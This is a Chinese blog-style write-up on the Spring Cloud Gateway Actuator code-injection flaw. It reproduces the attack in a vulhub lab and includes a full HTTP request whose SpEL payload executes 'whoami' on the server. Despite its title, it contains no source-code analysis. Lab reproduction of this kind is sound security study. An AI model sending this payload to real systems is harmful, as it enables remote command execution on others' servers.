SpringCloud?Gateway远程命令执行漏洞源码分析


这篇文章主要讲解了“SpringCloudGateway远程命令执行漏洞源码分析”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“SpringCloudGateway远程命令执行漏洞源码分析”吧!

漏洞描述

使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。

当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令。

影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本

环境搭建

漏洞环境搭建,采用vulhub,搭建方法,自行搜索。

搭建成功后,访问一下

漏洞复现

1.查看actuator端点是开启的

抓包,并修改接口为/actuator

2. 查看/actuator/gateway/routes

返回的路由信息,意思是当访问index时,路由到example:80

3.创建路由

POST/actuator/gateway/routes/testHTTP/1.1Host:192.168.10.171:8080User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:94.0)Gecko/20100101Firefox/94.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:zh,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip,deflateConnection:closeUpgrade-Insecure-Requests:1If-Modified-Since:Thu,17Oct202307:18:26GMTIf-None-Match:"3147526947"Cache-Control:max-age=0Content-Type:application/jsonContent-Length:431{"id":"test","filters":[{"name":"AddResponseHeader","args":{"value":"#{newjava.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(newString[]{\"whoami\"}).getInputStream()))}","name":"cmd"}}],"uri":"example:80","order":0}

4.刷新路由

5.访问创建的路由

6.删除路由

7.再次刷新路由

8.然后,访问该路由,发现路由已被删除

感谢各位的阅读,以上就是“SpringCloudGateway远程命令执行漏洞源码分析”的内容了,经过本文的学习后,相信大家对SpringCloudGateway远程命令执行漏洞源码分析这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是主机评测网,小编将为大家推送更多相关知识点的文章,欢迎关注!


上一篇:Reactor模型如何实现

下一篇:Pandas?merge怎么合并两个DataFram


Copyright © 2002-2019 测速网 https://www.inhv.cn/ 皖ICP备2023010105号 城市 地区 街道
温馨提示:部分文章图片数据来源与网络,仅供参考!版权归原作者所有,如有侵权请联系删除!
热门搜索